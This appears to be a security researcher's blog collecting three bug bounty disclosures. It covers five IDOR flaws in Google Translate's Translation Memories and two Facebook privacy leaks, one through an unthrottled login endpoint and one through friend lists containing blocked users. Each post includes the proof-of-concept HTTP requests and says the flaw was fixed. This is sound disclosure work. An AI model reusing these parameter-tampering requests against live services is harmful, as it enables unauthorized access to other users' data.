Wednesday, 29 June 2016

5 IDORs in translate.google.com

Hello,

Shailesh here!

There is a module named "Translation Toolkit" in https://translate.google.com and i found that a sub-module named "Translation Memories" was fully vulnerable to IDOR vulnerabilities!

I found 5 IDORs in Translation Memories.
 
1. IDOR to change name of victim's Translation Memory :
An attacker was able to change name of victim's translation memory because there was lack of proper ACLs at this endpoint.

HTTP Request :
POST /toolkit/utmname?hl=en HTTP/1.1
Host: translate.google.com

..

security_token=AKrFfvIvi97LGuNHa3w_vpTZyWwPszzm5g%3A1467183119818&tmid=8a73972848d860ed&tmname=renamed_by_attacker

2. IDOR to search from victim's Translation Memory :

An attacker was able to search from victim's translation memory because there was lack of proper ACLs at this endpoint too.

HTTP Request :
POST /toolkit/gettm HTTP/1.1
Host: translate.google.com
...

hl=en&src=a&sl=en&tl=sq&tmids=1e0cd01b8a7bde44&thld=0&mofmt=true

3. IDOR to replace or add .tmx file into victim's Translation Memory : 

You may find something about .tmx file from Here. I used such .tmx file to add some data into victim's Translation Memory. I was able to replace or combine .tmx data into victim's translation memory because of lack of proper ACLs on uploading .tmx file into a Translation Memory.

HTTP Request :
POST /toolkit/tmappend?hl=en HTTP/1.1
Host: translate.google.com
..

------WebKitFormBoundarymGTgNNHKz4FAMIdY
Content-Disposition: form-data; name="security_token"

AKrFfvKLf60q11l-TlCENLERqMD0KI9LAA:1447909448118
------WebKitFormBoundarymGTgNNHKz4FAMIdY
Content-Disposition: form-data; name="tmid"

07a132fa949ac969
------WebKitFormBoundarymGTgNNHKz4FAMIdY
Content-Disposition: form-data; name="tloc"; filename="my_memory (1).tmx"
Content-Type: application/octet-stream
<XML>...
------WebKitFormBoundarymGTgNNHKz4FAMIdY--

4. IDOR to delete victim's Translation Memory :

Yeah!!  Also, There was no
ACLs at this endpoint. So an attacker was able to delete victim's translation memory using a simple IDOR mechanism.

HTTP Request :
POST /toolkit/deletetm HTTP/1.1
Host: translate.google.com
..
hl=en&tmids=850b211b36c39a1e&security_token=AKrFfvKaPs2JVm4aGg8xLSyE_-o1RMc-Uw%3A1467184220688

5. IDOR to takeover victim's Translation Memory :

There was no ACLs on sharing a Translation Memory with an user. So an attacker was able to share victim's Translation Memory with himself to be an owner of that particular Translation Memory.

HTTP Request :
POST /toolkit/utminfo HTTP/1.1
Host: translate.google.com
Connection: keep-alive
Content-Length: 396
...


hl=en&tmid=1e0cd01b8a7bde44&acl=[{"access":7,"me":true,"email":"victim.dummy.4594@gmail.com"},{"access":7,"email":"attacker.dummy.4594@gmail.com"},{"email":"@gmail.com","access":7,"caa":false,"new":true}]&ntfy=true&copy=false&security_token=xxxxxx:144786375312

In short, i was able to modify victim's Translation Memory.
For all requests, tmid(s) was a vulnerable parameter!

That's all ;)

Due to low-sensitive data leakage, i received a combined bounty of $3133.7 from Google.




Thank you for reading!  :-)

-Shailesh Suthar


Monday, 1 February 2016

Information Disclosure in Facebook - PoC by Shailesh Suthar



Hello!

I found a vulnerability in which i was able to disclose following information of Facebook users.

> Full name of User
> Mobile number or Email Address
> Profile Pic

Endpoint :

POST /login/async/known_user_block/?login_id=[MOBILE_NUMBER or EMAIL_ADDRESS] HTTP/1.1
Host: www.facebook.com
Content-Length: 44

__user=0&__a=1&__dyn=x&__req=1&lsd=x&__rev=x

This endpoint was not rate limited!

It was not a normal user enumeration because full name and profile pic were disclosed and also, mobile numbers/email addresses with "only me" privacy were disclosed via this endpoint!

That's all ;)

Actually, Mentioned endpoint was available to just a very small subset of users (only a very small subset of users could use the endpoint) so impact was very low otherwise this might be called a perfect privacy leakage issue!

Because of very limited impact, i got a minimum reward from Facebook.
Thanks to Facebook security team for fixing this one!

Due to this one and one more, I am listed in Facebook Hall of Fame - 2016!

Update : On 10th Feb'16, I got an email from Facebook security team on this ticket that "After further review of this issue, we have decided to increase the reward to $1500 USD total."

I am very thankful to The Facebook Security Team for taking another look of this issue without my request! :-) It's impressive!

Thanks for reading!
  
Twitter : https://twitter.com/shailesh4594

Report Timeline:
============
5 December 2015    - Report Sent
8 December 2015    - Asked for more information by Facebook (Due to abnormal endpoint)
8 December 2015    - More information sent
18 December 2015  - Escalation by Facebook
29 December 2015  - Bounty Awarded of $500 USD by Facebook :) (First Bounty)
8 January 2016       - Fix Deployed by Facebook
10 February 2016    - Bounty Awarded of $1000 USD by Facebook :) (Second Bounty)
 

Wednesday, 29 April 2015

Privacy leakage vulnerability in facebook - PoC by Shailesh Suthar



Privacy Leakage : Counts of actions of a blocked user can be viewed.

Hello , I am Shailesh Suthar, an independent security researcher. I found a vulnerability using that i was able to view counts of recent updates of a blocked user. Also It was possible to view counts of updates regarding status, photos, games, comments-likes , music-videos and other activities separately!

PoC: 
When we create a new friend list , following POST request is generated :

POST /friends/edit/ajax/save_list/ HTTP/1.1
Host: www.facebook.com
...
 
fb_dtsg=AQHtqbvxxxxx&listname=NAME_OF_LIST&members[0]=PROFILE_ID_OF_USER&text_members[0]=NAME_OF_USER&__user=100002309650515&__a=1&__dyn=xxxxxEyl2lm9o-t2u5bHaEWCueyrhEK4xxxxxxxxxxxCqrZo8popyui9DBwIhEyfyUnwPUS2O4K5e8xxxxxxxxxxxx&__req=d3&ttstamp=2658172116113981185356757249&__rev=1711798


Then I modified two parameters as below :

            listname=Dummy
            members[0]=PROFILE_ID_OF_BLOCKED_USER

Received below response:


for (;;);{"__ar":1,"payload":null,"onload":["goURI(\"\\\/lists\\\/ID_OF__FRIEND_LIST\");"],"bootloadable":{},"ixData":{},"lid":"0"}

Blocked person was added into new friend list name “Dummy”.
And just blocked user was existed in this List.

Even adding a blocked person in a friend list is not a security vulnerability (Still allowed). So I checked page of Friend lists (https://www.facebook.com/bookmarks/lists)
  

A counting number was shown for friend list as pointed in below image!





I reported this to Facebook security team. And it got fixed!
Thanks to Facebook security team for fixing this one.


Report Timeline:
============
Dec 28, 2014 8:38pm   - Report Sent
Jan 3, 2015 3:01am      - Escalation by Facebook
Jan 15, 2015 2:08am    - Fix Deployed by Facebook

Mar 6, 2015 11:11pm   - Bounty Awarded of  $1000 USD by Facebook :)